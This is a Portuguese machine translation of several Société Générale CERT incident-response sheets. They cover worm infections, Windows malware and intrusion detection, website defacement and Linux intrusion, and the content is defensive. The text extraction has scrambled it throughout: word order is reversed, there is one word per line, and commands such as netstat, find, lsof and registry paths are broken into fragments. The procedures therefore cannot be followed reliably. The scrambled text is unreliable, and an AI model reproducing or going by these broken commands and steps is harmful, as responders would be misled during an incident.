logs),
de
analisadores
IDS,
(antivírus,
funcional
atualizado.
e
comprometido

validadas.
evasão
técnicas
encontre
ou
infecção
vetor
um
seja
ele
que
garantir
de
depois
permita-
desconectado,
ser
puder
não
negócios
os
para
crítico
tráfego
o
Se

3.
Certifique-
suas
arquitetura
mapa
um
ter
de
se
ÿ
redes.

Certifique-
dos
atualizado
inventário
um
que
de
se
ÿ
disponível.
está
ativos
etc.)
dispositivos,
desabilitação
tráfego,
bloqueio
(patch,
aplicadas
devem
relevantes
Contramedidas
software.
falha
até
rede
tráfego
desde
coisa,
qualquer
ser
pode
propagação
de
vetor

crise.
célula
uma
criarão
necessário,
se
e,
contato
em
entrarão
“preparação”
de
etapa
na
definidos
atores
os
detectados,
sejam
sintomas
destes
vários
ou
um
Caso
e
contínua
vigilância
uma
Realizar
ameaças.
de
tendências
as
sobre
segurança
pela
responsáveis
os
Informar
ÿ

A
propagação.
de
vetores
os
Neutralizar
usadas:
ser
podem
técnicas
seguintes
as
exemplo,
Por
4.

operacionais.
Procedimentos
firewall,
Regras
Windows,
do
GPO
(WSUS),
patches
implantação
de
-Ferramentas
contramedidas.
as
e

os
seu
verme,
o
identificar
para
sintomas
os
Analisar

Identificar
em:
encontrados
ser
podem
leads
Os do
subárea
cada
em
4
a
2
passos
os
5.

CERT;
do
ÿBoletins suporte).
chamadas
servidor,
do
logs
antivírus,
(console
análise
ferramentas
usando
infecção
a
monitore
possível,
Se
espalhar.
se
de
pare
worm
o
que
até
infectada
área

etc.)
etc.);
SecurityFocus,
Secunia,
(empresas
segurança
de
Sites
Externo
ÿ
suporte contatos (antivírus

monitorada.
ser
deve
verme
do
propagação
A

Informação.
da
Segurança
de
Diretor
o
Notifique
necessário.
se
CERT,
seu
com
contato
em
Entre

o worm.
pelo
propagação
vetor
como
usado
ser
pode
conexões.
suas
as
todas
bloqueie
possível,
Se
móvel.
armazenamento
ou
PDA
laptop,
nenhum
que
de
se
Certifique-
Dispositivos

etc.).
subsidiária,
uma
a
limitada
global,
exemplo:
(por
infecção
da
limites
os
Defina
Avalie

infecção.
da
comercial
impacto
o
identifique
possível,
Se precisão.
com
diretrizes
as
sigam
que
finais
usuários
aos
Peça

82
96
 4 5
Incidentes
a
Resposta
de
Metodologia

prosseguir
de
antes
gerência
da
aprovação
a
obtenha
e
corretamente
realizadas
foram
anteriores
etapas
as
todas
se
Verifique

Remediação
correção.
de
métodos
e
ferramentas
Identifique

Recuperação
passos.
próximos

considerados:
ser
devem
recursos
seguintes
Os
Machine Translated by Google

#1
IRM
etc.)
Oracle,
(Microsoft,
fornecedores
-de um
como
usado
foi
que
rede
de
tráfego
o
Reabra

1.
segurança
Sites
externo
suporte
Contatos
antivírus
assinaturas
dados
de
-Banco verme.
pelo
propagação
de
método

à
informação
de
sistemas
em
worms
por
infecções
com
lidar
para
Diretrizes
subáreas
as
Reconecte

2.
___________________________________________________

Identificar
1.2
Versão
Lacome
Ferran-
Vincent
SG/
CERT
IRM:
do
Autor Resposta

exemplo.
CERT,
seu
como
externa,
estrutura
uma
por
validado
ser
que
tem
O
desinfecção.
de
processo
um
Defina área
à
móveis
laptops
os
Reconecte

3.
cert.societegenerale.com
http://
Site:
[email protected]
mail:
E-
local
rede
sua
à
área
a
Reconecte

4.
@CertSG
Twitter:
Internet
à
área
a
Reconecte

5.

Teste
ele
que
se
certifique-
e
desinfecção
de
processo
o
Teste
crise.
equipe
pela
aplicado
será
técnico
monitoramento
um
e
gradual
forma
de
executadas
serão
etapas
essas
Todas
serviço.
nenhum
danificar
sem
corretamente
funciona
específico.
segurança
problema
investigam
que
incidentes
manipuladores
dedicado
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
Resumo

IRM?
planilhas
usar
deve
Quem
•
Computadores)
Emergências
a
Resposta
de
(Equipe
CERTs delegados
e
•CISOs
Administradores
Segurança
Operações
de
Centro
•
6

Implantar
usadas:
ser
podem
opções
Várias
desinfecção.
ferramentas
as
Implante
manual
Desinfecção
antivírus
assinatura
de
Implantação
GPO
WSUS
-Windows
na
intervenientes
os
todos
a
disponibilizado
e
escrito
ser
deve
crise
de
relatório
Um

Consequências

Relatório
se: e
Lembre-

gerenciamento.
de
célula

descritos:
ser
devem
temas
seguintes
Os
encontrada.
ser
precisa
alternativa
solução
uma
caso,
o
for
Se
remediação.
implantação
de
métodos
dos
bloquear
podem
worms
alguns - infecção
da
inicial
Causa
segurança
de
incidentes
com
lidar
para
definidas
são
etapas
6
Etapas

importante
cada
de
cronogramas
-e

Aviso:
evento

certo
-deu
crise.
de
célula
pela
monitorado
ser
deve
remediação
da
progresso
O
errado
-deu
incidente
-do
Preparação:
o Contenção: e
o Identificação:
o Remediação:
a Recuperação:
Resultado:

vermes.
por
infecção
gerenciamento
de
experiência
a
melhorar
ações
essas
capitalizar
para
definidos
ser
devem
processos
Capitalizar

público
uso
para
é
documento
Este

83
97
 1 2 2

Preparação
Identificação
Identificação
sistema:
do
IP
TCP/
portas
nas
suspeita
atividade
qualquer
por
Procure
ÿ

ser
deve
suspeito
sistema
físico
acesso
ÿUm
forense.
investigador
ao
oferecido Administradores:
grupo
no
especialmente
criadas,
desconhecidas
e
incomuns
contas
por
Procure

Contas
\>
–
\>
C:

C:
locais
atividades
das
e
rede
conhecimento
bom
ÿUm
atual.
estado
o
com
comparação
de
base
uma
para
porta,
da
usual
atividade
a
descrevendo
arquivo
um
ter
deve
Você
apreciado.
é
computador
do processo:
cada
de
proprietário
ver
2003
XP/
Windows
para
–
sinalizador
o
Use

lusrmgr.msc
Machine Translated by Google

–
C:

Arquivos
maiores
armazenamento,
de
suporte
no
incomuns
grandes
arquivos
por
ÿProcure

usados
comumente
e
serviços
dos
conhecimento
bom
ÿUm
aplicável.
quando
Windows,
especialista
um
a
ajuda
pedir
em
hesite
Não
necessário.
é
instalados
aplicativos
razoável.
ser
parece
MB
10
de
mais
específica.
rede
uma
exemplo)
por
bancário,
(site
sensíveis
sites
alguns
em
navega
enquanto
o
use
testemunhada,
for
suspeita
atividade
nenhuma
Se
remotos.
sistemas
para
ou
conexões
de
incomuns
tentativas
há
se
veja
e
etc.)
tcpdump
(Wireshark,
sniffer
um
Use
ÿ

\WINDOWS\system32.
C:
especialmente
sistema,
do
pastas
em
recentemente
adicionados
incomuns
arquivos
por
ÿProcure

“oculto”:
atributo
o
usando
arquivos
Procure
ÿ

C:
rede.
legítima
atividade
da
conhecimento
bom
um
necessário
é
Observação:

inicialização
da
momento
no
iniciados
incomuns
programas
por
Procure

Entradas
especialmente:
Windows,
do
Registro

2
Tarefas

incomum:
entrada
qualquer
para
agendadas
tarefas
de
lista
a
Veja
ÿ

XP:
2003/
Windows
No
C: C:

Identificação

Sinais
HKCU
no
entradas
mesmas
as
Verifique
usuário:
do
automática
inicialização
de
diretórios
os
também
ÿ

\Iniciar
malware:
um
por
comprometido
estar
pode
sistema
o
que
indicar
podem
pistas
Várias
C:

e
e C:

desconhecidas,
incomuns/
entradas
de
busca
execução
em
processos
os
todos
Verifique
ÿ

e
\>
C:
(ou
assinaturas
suas
atualizar
alerta
um
gerando
Antivírus
ÿ
manualmente
mesmo
nem
conseguir
não
executar
de
parar
ou

HKLM\Software\Microsoft\Windows\Versão
Processos
muito
faz
rígido
o
rígido:
disco
do
incomum
ÿAtividade incomuns:
entradas
busca
em
log
de
arquivos
seus
Observe
ÿ

HKLM\Software\Microsoft\Windows\Versão
HKLM\Software\Microsoft\Windows
taskmgr.exe
inesperados.
momentos
em
operações

HKLM\Software\Microsoft\Windows\Versão
Entradas C:

entregando
estivesse
normalmente
embora
lento:
excepcionalmente
Computador
instalados
inesperados
incomuns/
rede
de
serviços
por
Procure
ÿ
ÿ
recentemente
lento
mais
ficou
velocidade,
boa seguintes:
os
como
eventos
Pesquise
ÿ
começou:
e

\>
C:
“O “A

lenta
muito
é
Internet
com
conexão
incomum:
rede
ÿAtividade
navegação.
de
tempo
do
parte
maior
a
“O

motivo.
sem
reinicia
computador
ÿO
usuais.
serviços
dos
conhecimento
bom
um
necessário
é
Nota:
arquivo “O

inesperadamente.
travando
estão
ÿaplicativos
suspeitas.
atividades
busca
em
houver)
(se
firewall
seu
do
log
de
arquivos
os
ÿMonitore

evidências.
destruir
isso
que
de
ciente
esteja
mas
sistema,
no
malware
identificar
para
atualizado
antivírus
um
usar
pode
também
Você
aÿ
vinculado
está
um
cada
verifique
e
arquivos
de
compartilhamentos
há
se
Verifique

\
na
navegação
a
durante
aparecem
up
pop-
ÿJanelas
navegar)
sem
mesmo
até
vezes
(às
web.

\>
C:
Atividade
mais
ou
um
de
negra
lista
na
está
estático)
(se
IP
endereço
ÿSeu
resultados.
bons
dar
de
ferramentas
suas
as
todas
distraindo
exemplo,
por
ativo,
estar
pode
rootkit
Um
infectado.
esteja
sistema
o
que
significa
não
isso
encontrado,
sido
tenha
suspeito
nada
Caso
Internet.
da
negras
Listas
máquina:
na
abertas
sessões
as
Veja
ÿ
C:

mails
e-
enviando
você
sobre
reclamando
estão
pessoas
ÿAs Ways.
X-
ou
EnCase
como
ferramentas
usando
analisar
e
contém
que
rígido
disco
do
a
bit
cópia
uma
fazer
é
ideal
caso
O
suspeito.
for
ainda
o
se
desligado,
estiver
ele
enquanto
sistema
no
feitas
ser
podem
forenses
investigações
Mais
abriu
máquina
a
que
ações
nas
olhada
uma
Dê
ÿ
autorizados
Usuários
Windows.
do
padrão
ferramentas
usam
abaixo
ações
As

tarefas.
essas
executar
para
problemas
solução
de
utilitários
os
usar
pode
\> C:

da
Netbios:
o
com
suspeita
conexão
alguma
há
ÿse
–
C:

Sysinternals

84
98
 3

Contenção
exemplo).
por
sistema,
arquivos
armazenar
ou
DDoS
ataques
de
participar
massa,
em
spam
enviar
pode
malware
(o
computador
seu
no
realizadas
sejam
ilegais
ações
que
impedir
e
na
infecções
mais
evitar
para
rede
da
plugue
o
fisicamente
Desconecte Incidentes
a
Resposta
de
Metodologia
5

confiáveis.
backups
de
partir
a
usuário
do
dados
restaure
aplicativos
os
e
operacional
sistema
o
reinstale
possível,
Se

Recuperação
senha).
uma
usando
criptografado
suspeito,
binário
compactado
arquivo
um
criar
é
maneira
melhor
(A
empresa.
sua
da
contratados
com
especialmente
AV,
empresas
as
todas
lo
enviá-
pode
e
malicioso
conteúdo
isolar
de
capaz
ser
deve
O
malware.
o
sobre
certeza
tiver
não
se
CERT
do
ajuda
a
solicite
ou
CERT,
seu
para
suspeitos
binários
os
Envie completamente:
reinstalado
sido
tenha
não
computador
o
Caso
Machine Translated by Google

#7
IRM

suspeito
computador
um
em
vivo
ao
Análise

Restaure
memória.
rígidos
discos
o
todo
em
vírus
de
verificação
uma
fazendo
sistema,
do
integridade
verifique
e
feita
sido
tiver
limpeza
a
toda
que
depois

a
Detecção
___________________________________________________

arquivos Reinicie
CERT /
Autor
1.2
IRM:
do
Versão
Pernet
Cédric

máquina
[email protected]
mail:
E-
cert.societegenerale.com
http://
Site:
@CertSG
Twitter:

4 6

importante.
conteúdo
do
cópia
uma
fazerem
para
peça
helpdesk
rígido
disco
seu
leve
certeza,
tiver
não
Se
externo.
armazenamento
suporte
em
importantes
dados
os
todos
backup
faça
e
vivo
ao
CD
um
de
partir
a
Reinicie

Remediação
interessadas.
partes
as
todas
a
disponibilizado
e
escrito
ser
deve
incidente
de
relatório
Um

Relatório
Consequências
específico.
segurança
problema
investigar
por
responsáveis
dedicado
referência
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
Resumo

descritos:
ser
devem
temas
seguintes
Os
IRM?
planilhas
usar
deve
Quem

e
inicial.
ÿ • Administradores
antivírus.
empresas
de
sites
em
encontradas
ser
podem
geralmente
Elas
malware.
o
remover
para
práticas
melhores
as
Encontre
ÿ
•

Remova
cronogramas.
e
ÿ Computadores)
Emergências
a
Resposta
de
(Equipe
•CERTs
delegados
e
CISOs •
Segurança
Operações
de
Centro

online.
antivírus
verificação
uma
ÿExecute
certo.
deu
que
O
ÿ

errado.
deu
que
O
ÿ
desinfecção
contendo
PE
Bart
em
baseado
Inicie
ÿ
dedicado.
antivírus
CD
live
um
ou
AV)
sites
de
baixadas
ser
(podem
ferramentas
se:

incidente.
do
Custo
ÿ
Lembre-

experiência.
essa
capitalizar
definidas
ser
devem
Windows
do
malware
detecção
de
processos
os
melhorar
para
Ações

Capitalizar
segurança
de
incidentes
com
lidar
para
definidas
são
etapas
6
Etapas

ÿ
o
se
para
lidar
prepare-
Preparação:

85
99
 1 2 2

tarefas.
dessas
maioria
a
executar
para
usados
ser
problemas
solução
de
utilitários
os
que
Observe máquina:
na
abertas
sessões
-as

Preparação
Identificação
Identificação

da
C:
ser
deve
suspeito
Um
ÿ
rede
(usando
sistema
no
feitas
investigações
as
exemplo).
por
sniffer
detectar
pode
hacker
o
que
vez
uma
remoto,
preferível
é
físico
acesso
O
forense.
investigador
ao
dado
ÿ
sistemas:
outros
com
abriu
máquina
a
que
sessões
nas
olhada
uma
-Dê
Administradores:
grupo
no
especialmente
criadas,
incomuns
contas
por
Procure

Sysinternals \>
C:
Machine Translated by Google

C:
ou

lusrmgr.msc
Netbios:
o
com
suspeita
conexão
alguma
há
-se

\>
C:
–
C:
necessária
rígido
disco
do
física
cópia
Uma
ÿ
uma
necessário,
se
Finalmente,
evidência.
e
forenses
fins
rede.
qualquer
de
suspeita
máquina
a
desconectar
para
necessário
ser
pode
físico
acesso

sistema:
do
portas
nas
suspeita
atividade
qualquer
por
-Procure

–
\>
C:
ÿ

-
\>
C:
netstat
rede
conhecimento
bom
ÿUm
atual.
estado
o
com
eficientemente
comparar
para
porta,
da
usual
atividade
a
descrevendo
seguro
local
em
arquivo
um
ter
deve
Você
necessário.
é
servidor
máquina/
processo:
cada
de
proprietário
ver
2003
XP/
Windows
para
–
sinalizador
o
Use

Arquivos
–

incomuns
\>
C:
nao
netstat
\WINDOWS\system32.
C:
especialmente
sistema,
do
pastas
em
recentemente
adicionados
incomuns
arquivos
por
-Procure

máquina.
da
execução
processos
serviços/
os
todos
de
mapa
um
ter
também
é
ideia
boa
uma
perguntar
em
hesite
Não
útil.
muito
ser
pode
máquina
“hidden”:
atributo
o
usando
arquivos
-Procure
no
execução
usuais
serviços
dos
conhecimento
bom
ÿ
Um
aplicável.
quando
assistência,
sua
por
Windows
em
Especialista
ÿ
-
possível.
se
- incomum:
entrada
qualquer
para
agendadas
tarefas
de
lista
a
Veja

XP:
2003/
Windows
No
especialmente:
Windows,
do
registro
inicialização
da
momento
no
iniciados
incomuns
programas
por
Procure
Inicialização
sua
na
olhada
uma
dê
(Também
possível.
se
Use
ÿ
C: C:

de
pasta)
Registro
ÿ

Entradas
o

suspeito.
como
adicional
aplicativo
serviço/
processo/
qualquer
considere
software,
instalar
para
permissão
têm
não
os
tal
Em
aplicativos.
serviços/
processos/
partir
a
instaladas
mesmas,
são
usuários
dos
máquinas
as
todas
onde
enorme,
corporativo
ambiente
em
trabalhar
real
vantagem
uma
ser
Pode
de
mapa
um
Tenha
mestre.
CD
todo

Incomuns
de
log

“HiJackThis”
Entradas

suspeito.
serviço
novo
qualquer
ou
arquivos
de
proteção
a
antivírus,
firewall,
o
afetam
que
eventos
por
Procure

a
mais
você
ÿ

Quanto
Windows)
do
versão
da
dependendo
(ou
“ADMINISTRATOR”:
e
“SYSTEM”
usuário
de
nome
com
especialmente
desconhecidas,
incomuns/
entradas
para
execução
em
processos
os
todos
Verifique bloqueadas.
contas
ou
falha
com
login
tentativas
de
quantidade
grande
uma
por
Procure

tlisk,
tasklist
suspeitas.
atividades
busca
em
houver)
(se
firewall
seu
do
log
de
arquivos
os
Monitore

\>
C:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
ÿ
de

ÿ
Verificação

C:
uma.
apenas
que
do
ferramentas
dessas
várias
executar
melhor
sempre
É

e C:
ÿ
atualizado.
absolutamente
estar
deve
antivírus
O
antivírus.
vários
use
ÿ
o

e
de
pelo

\>
C:
instalado
Verificação

ÿ
\
de

normal:
atividade
uma
a
vinculado
está
um
cada
verifique
e
arquivos
de
compartilhamentos
há
se
-Verifique
Atividade

86
100
 3 5

Contenção
etc.)
win32dd
Memoryze,
como
ferramentas
(use
posterior.
análise
sistema
do
memória
cópia
uma
Também
arquivos.
deletar
comece
investigando
está
você
que
perceba
hacker
o
caso
importantes
dados
os
todos
de
backup
faça
desconectada,
ser
puder
não
e
empresa
sua
da
comercial
atividade
para
crítica
considerada
for
máquina
a
Se prática
melhor
a
penetrado,
sido
desde
comprometimento,
sobre
ter
possa
você
que
conhecimento
e
sistema
no
entrado
tenha
hacker
longe
quão
o
importa
Não Incidentes
a
Resposta
de
Metodologia

é
Recuperação

a
o
sistema
reinstale
deve:
você
aplicada,
ser
possa
não
solução
esta
Caso
Machine Translated by Google

desligue.
computador
que
até
segundos
alguns
por
“off”
botão
o
apertar
basta
bateria,
com
laptop
um
energia.
de
plugue
seu
removendo
difícil,
mais
maneira
da
desligue-
desconectada,
ser
puder
e
empresa
sua
para
crítica
considerada
for
não
máquina
a
Se #2
IRM

e
as
ÿ
caracteres.
8
menos
pelo
ter
e
números
especiais,
caracteres
minúsculas,
maiúsculas/
letras
senhas
usar
devem
eles
segura:
forma
de
isso
façam
usuários
seus
que
com
faça
suspeito
Windows
sistema
um
em
vivo
ao
Análise

todas
Altere
Detecção
___________________________________________________
comprometido.
considerado
deve
ainda
sistema
o
mas
resultado,
nenhum
der
não
vivo
ao
análise
a
se
imediatamente
iniciadas
ser
devem
offline
Investigações 1.2
Versão
Pernet
Cedric
SG/
CERT
IRM:
do
Autor

ÿ
invasor.
cert.societegenerale.com
http://
Site:
[email protected]
mail:
E-

o
uma
@CertSG
Twitter:

Faça
cópia
svchost.exe)

Tente
os
ÿ
ameaça.
a
avaliar
para
funcionalidade,
sua
menos
pelo
ou
ele
com
feito
foi
que
o
veja
e
forenses)
ferramentas
suas
(use específico.
segurança
problema
investigam
que
incidentes
manipuladores
dedicado
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
Resumo

todos
IRM?
planilhas
usar
deve
Quem
•

Encontre
Administradores
ÿ •

ÿ
o
6 Computadores)
Emergências
a
Resposta
de
(Equipe
•CERTs
delegados
e
CISOs •
Segurança
Operações
de
Centro

Verifique
dele.
através
crise.
gerenciamento
célula
da
atores
os
todos
a
disponibilizado
e
escrito
ser
deve
crise
de
relatório
Um

Relatório
Consequências
o
Se
se:

o
tente
geralmente,
Mais
ÿ
roubo
cumplicidade/
uma
ou
físico
acesso
computador
nenhum
Se
consideradas.
ser
devem
pistas
as
Todas
funcionário.
um
informações
vir
pode
que
de
esqueça
se
nunca
encontrada,
for
intrusão
da
prova descritos:
ser
devem
temas
seguintes
Os

invasor
Lembre-

como
ÿinicial

sistema.
descobrir
errado
certo
deu
que
O
importante
evento
cada
de
cronogramas
e
ÿAções
e
operacional
(sistema
aplicável
quando
correções
Aplicar
ÿ
6
de

conhecida.
vulnerabilidade
uma
usado
tenha
invasor
o
caso
aplicações),
Etapas

incidente
do
ÿCusto
Preparação:

4
experiência.
essa
capitalizar
definidas
ser
devem
Windows
do
intrusão
detecção
gerenciamento
de
processos
os
melhorar
para
Ações
e
Identificação:
o Contenção:

Capitalizar

o
Remediação
o Remediação:

O
a Recuperação:

Caso
envolvidas
contas
às
acessos
os
todos
temporariamente
Remover
ÿ
Resultado:

incidente.
no

invasor.
pelo
instalados
maliciosos
arquivos
os
todos
Remova
ÿ

público
uso
para
é
documento
Este

87
101
 2 3

e
Contenção

Preparação
Identificação

reunir
definir
Mitigar

Detectar
Objetivo:

Objetivo:

contatos,

objetivos:
estabelecer
Os
os

procedimentos
Machine Translated by Google

de
seus
descrevendo
atualizados
esquemas
ÿTenha
web
à
relacionados
aplicativos
componentes ÿ
excluídos.
arquivos
recuperar
para
útil
será
Isso
web.
servidor
O
evidências.
de
coleta
e
forenses
propósitos
contendo
rígido
disco
do
bit
completa
cópia
uma
fazer
é
aplicável,
se
aqui,
prática
melhor
a

todos
servidor. Web
uma
Web:
da
página
ÿMonitoramento
xxx”)
0wn3d
(“Você
óbvio
ou
exemplo)
por
“iframe”,
de
injeção
(uma
discreto
muito
é
conteúdo
novo
O
alterado.
foi

backup
Faça
em
pronto,
e
pronto
backup
de
site
um
ÿCrie
conteúdo.
publicar
pode
você
qual
no

em
funcionários
notificação
ou
usuários
de
chamada
Usuário:
ÿ
site.
no
navegar
ao
notaram
que
problemas
sobre não

comprometidos.
estar
podem
que
sistemas,
com
conexões
as
máquina,
naquela
execução
em
serviços
outros
executado,
sendo
está
web
servidor
qual
no
sistema
o
-Verifique
visitante
cada
redirecionar
para
procedimento
um
ÿDefina
backup.
de
site
este
localizado

Google
o
como
ferramentas
com
segurança
de
Verificações
ÿ
SafeBrowsing

qualquer
rapidamente
detectar
para
monitoramento
de
ferramentas
ÿImplante
críticos.
sites
seus
em
anormal
comportamento

a
verifique
particular,
(em
estático
conteúdo
com
arquivos
os
Verifique o.
investigue-
o
desconecte-
rede,
na
sistema
outro
for
ataque
do
origem
a
Se
e
fisicamente
possível
se

Verifique
externo
um
para
web
servidor
do
log
arquivos
ÿExporte
cada
entre
sincronizados
estejam
relógios
os
que
de
se
Certifique-
servidor.
ÿ
hash).
assinatura
modificação,
de
datas
as

mashup.
conteúdo
de
provedores
os
ÿ

meta,
(src,
web
página
na
presente
link
o
Verifique
Tente

ÿ
…).
script,
css,
deles.
um
cada
para
lista
uma
crie
e
dinâmico) ÿ
o

log.
de
arquivos
os
ÿ
ou
(estáticos
externos
conteúdos
a
ÿReferência
publicidade.
para
terceiros
de
esqueça
se
Não
o

malicioso.
conteúdo
busca
em
dados
de
bancos
os
ÿ
bug.
o
corrigir
pública:
pasta
Abrir
gravação:
acesso
permitindo
Web
da
componente
de
-Vulnerabilidade

hospedagem
provedor
seu
do
referência
contato
de
ÿPontos
provedor.

o
O

da
código.
o
corrija
injeção:
permitindo
SQL
-de

fonte
mashup.
feed
o
corte
mashup:
-do

página
código-
aplica
hospedagem
provedor
seu
que
de
ÿse

suspeita
físico:
acesso
por
-administrativa
eventos.
os
todos
registrar
para
políticas
editor.
do
correção
aplicando
vulnerabilidade
a
corrija
acesso.
de
direitos
os
modifique

atualizada
rede
uma
ter
de
ÿse
e

mapa. ÿ
legítimo.
etc.
PL/
CGI/
ASP/
PHP/
no
vulnerabilidade
usado
tenha
invasor
caso
infecção
outra
evita
Isso
HTML.
código
apenas
contendo
temporário,
estático
um
exibir
é
melhor
O
indisponível”.
“Temporariamente
como
legítimo,
outro
mostrar
menos
pelo
ou
comprometido
web
servidor
que
conteúdo
mesmo
o
oferecer
deve
Ele
aplicativos.
seus
com
atualizado
Se
um
web
web),

(problema
servidor
necessário
temporário,
implemente

88
102
 Incidentes
a
Resposta
de
Metodologia
4 6

a
Remediação
os
Consequências

Tomar
Machine Translated by Google

Objetivo:
Objetivo:
anteriores.
vulnerabilidades
restaurado
legítimo,
do
livre
esteja
conteúdo
esse
que
de
se
Certifique-
backup.
um
por
o
substitua-
e #6
IRM

o
Documentar

todo
alterado
Remova
comprometido
web
servidor
um
em
vivo
ao
Reação

conteúdo
publicamente.
incidente
o
explicar
planeje
usuários,
seus
dos
alguns
para
visível
for
desfiguração
a
Se

___________________________________________________
SG /
CERT
Autor
1.2
IRM:
do
Versão
Pernet
Cédric
Desfiguração

Comunicação
cert.societegenerale.com
http://
Site:
[email protected]
mail:
E-
envolvidas.
partes
as
todas
a
disponibilizado
e
escrito
ser
deve
crise
de
relatório
Um

Relatório
@CertSG
Twitter:

descritos:
ser
devem
temas
seguintes
Os

ÿinicial;

5 cronogramas;
ÿe
específico.
segurança
problema
investigar
por
responsáveis
dedicado
referência
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
certo;
deu
que
ÿO
Resumo

IRM?
planilhas
usar
deve
Quem

o
errado;
deu
que
ÿO

Recuperação
• Administradores
incidente.
do
Custo
ÿ •CISOs
Computadores)
Emergências
a
Resposta
de
(Equipe
•CERTs
delegados
e •
Segurança
Operações
de
Centro

Objetivo:
Restaurar
correção.
uma
liberar
atualizado
ser
possa
código
o
que
para
editor,
seu
ao
PHP)
fórum
(como
web
servidor
no
execução
produto
um
em
vulnerabilidade,
descoberta
de
caso
Em

o
não
o

informe
Se

senhas
se:

qualquer
ÿ
você
e
autenticação
forneça
usuário
do
comunicação
de
servidor
grande
um
exigir
pode
Isso
comprometidas.
sido
ter
podem
senhas
as
que
pensar
para
razões
evidências/
tem
Lembre-

documentada

todas
as Altere
vulnerabilidade

ÿ
o
do
segurança
de
incidentes
com
lidar
para
definidas
são
etapas
6
Etapas

componente
servidor.
Preparação: e
Identificação:
o Contenção:
o Remediação:

O
a Recuperação:
Resultado:

público
uso
para
é
documento
Este

89
103
 1 2 2

etc.)
ftpd,
(sshd,
remoto
ou
local
acesso
ferramentas
login
autenticação/
falhas
de
número
-Grande

Preparação
Identificação
Identificação
ser
deve
suspeito
sistema
físico
acesso
Um
ÿ
forense.
investigador
ao
oferecido em
incomuns
arquivos
por
ÿProcure
e
proc
maliciosos.
binários
ou
dados
armazenarem
hackers
para
escolha
de
local
um
é
diretório
último
Este
tmp.
/ /

…)
estranhos
caracteres
número
grande
um
inclui
que
log
entrada
uma
com
(RPC)
Remoto
Procedimento
Chamada
de
-Programas

necessária
rígido
disco
do
física
cópia
uma
necessário,
Se
evidência.
e
forenses
fins
rede.
qualquer
de
suspeita
máquina
a
desconectar
para
necessário
ser
pode
acesso “erro”
mencionando
Apache
do
logs
-de
hardware)
-do
Machine Translated by Google

list
--
#
habilitados:
serviços
os
todos
verificar
para
instalado)
(se
chkconfig
Execute
Linux)
(Somente software)
do
(reinicialização
aplicações
-de

Serviços
rede
conhecimento
bom
ÿUm
atual.
estado
o
com
eficientemente
comparar
para
porta,
da
usual
atividade
a
descrevendo
seguro
local
em
arquivo
um
ter
deve
Você
necessário.
é
servidor
máquina/
diretório /
no
localizados
de
arquivos
todos
Quase
principais:
os
estão
Aqui
Linux.
distribuições
das
maioria
na
log
var/

-aux
ps
#
aqui!).
especialmente
artigo,
neste
tudo
para
resultados
seus
alterar
desconhecidos
[pid]
p
–
lsof
Use
pode
rootkit
um
se:
(lembre-
execução
em
processos
os
Veja
sistema/ /
ao
relacionadas
coisas
e
gerais
Mensagens
autenticação
de
Logs
kernel
do
var/ /

e-
log/
/var/
var/
Não
usuais.
serviços
dos
conhecimento
bom
necessário
É
ÿ
aplicável.
quando
Linux,
Unix/
especialista
um
a
ajuda
pedir
em
hesite

críticos,
todos
de
regularmente
atualizada
lista
uma
ter
deve
ÿVocê
incomuns.
os
detectar
usuais
separar
facilmente
pode
você
lista,
esta
Com
papel.
mesmo
ou
rede
da
fora
seguro
local
um
em
armazenados
GUID)
e
SUID
arquivos
(especialmente hacker.
um
por
adicionados
sido
ter
podem
quais
descobrir
de
capaz
ser
e
execução
em
normalmente
processos
seus
conhecer
deve
Você auth.log:
kern.log:
message:

0.
UID
o
sob
executados
processos
aos
especial
atenção
Preste

trânsito.
de
regras
habituais/
portuárias
atividades
suas
das
mapa
um
ÿTenha

mode”
promiscuous
entered
eth0
device
“kernel:
como:
modo
maneiras:
várias
usando
rede
na
sniffers
detectar
Tente
promíscuo
modo
em
entram
que
interfaces
para
kernel
do
log
de
arquivos
os
Verifique úteis:
ser
podem
e
cat
como
ferramentas
log,
de
arquivos
os
examinar
Para
"GET
|grep
access.log
httpd/
log/
var/
signup.jsp"
/ /

Atividade
2
kernels.
os
todos
em
funciona
não
ifconfig
que
já
ifconfig,
ao
método
esse
Prefira
“PROMISC”.
flag
o
detectar
para
link
ip
#
Use

Identificação
em
suspeita
entrada
qualquer
por
Procure
também
Verifique
0.
UID
com
especialmente
passwd,
e
group
shadow.
etc/
/ / / suspeitos.
eventos
busca
em
sistema
no
kernel
do
log
de
arquivos
os
Examine
ÿ
Entradas

Contas
lsof
e
–
netstat
#
incomum:
porta
de
atividade
por
Procure
ÿ
portas.
escutam
que
processos
sobre
informações
mais
obter
para
Usar :

(\Procure
n
o
–
-print
\)find
#
ataque:
no
usada
excluída
conta
uma
deixados
sido
ter
podem
que
órfãos,
arquivos
por
ogroup
-nouser
/ #dmesg
-a
arp
#
LAN:
sua
em
incomuns
MAC
entradas
Procure
ÿ lspci
lsmod
#
sistema:
e
kernel
do
importantes
informações
as
todas
Listar

rede.
na
inesperado
IP
endereço
qualquer
por
Procure
ÿ semelhantes)
ferramentas
e
rkhunter
(use
conhecidos
rootkits
por
ÿProcure

( –-uid
o
–
-4000
perm
find /
#
GUID:
e
SUID
arquivos
os
todos
Procure
\ÿ
0

Arquivos
Hashes

Tarefas
““
em /
mencionados
usuários
incomuns
Procure
ÿ
-l
root
u
–
crontab
#
(root):
0
UID
contas
por
agendados
cron
trabalhos
aos
especial
atenção
Preste
cron.allow.
etc/ em // /
binários
seus
dos
MD5
hashes
os
todos
Verifique
sbin,
bin,
semelhante)
ferramenta
AIDE
(use
relacionado.
binário
armazenamento
de
local
outro
qualquer
ou
sbin
usr/
“# /
com
começando
estranhos,
arquivo
de
nomes
por
ÿProcure
print
find
#
“.
*“
“..
-name –
print “–
“..
ou
–
print :
“*“
encontrar /
#
-nome

dados.
esses
alterar
pode
sentir
você
e
feitas
forem
investigações
outras
as
todas
que
depois
feito
ser
deve
só
Isso
arquivos.
dos
timestamps
os
todos
mudará
provavelmente
operação
esta
AVISO:

cat /
#
sistema:
o
todo
em
incomuns
cron
tarefas
por
Procure
ÿ
crontab
etc/
print
find /
#
MB)
10
que
maiores
(aqui:
grandes
arquivos
por
Procure
ÿ
–
MB
+10
-size e
–
ls
#

use:
instalado,
RPM
com
sistemas
Em
–
rpm
#
seguintes:
incluindo
suspeitos,
eventos
busca
em
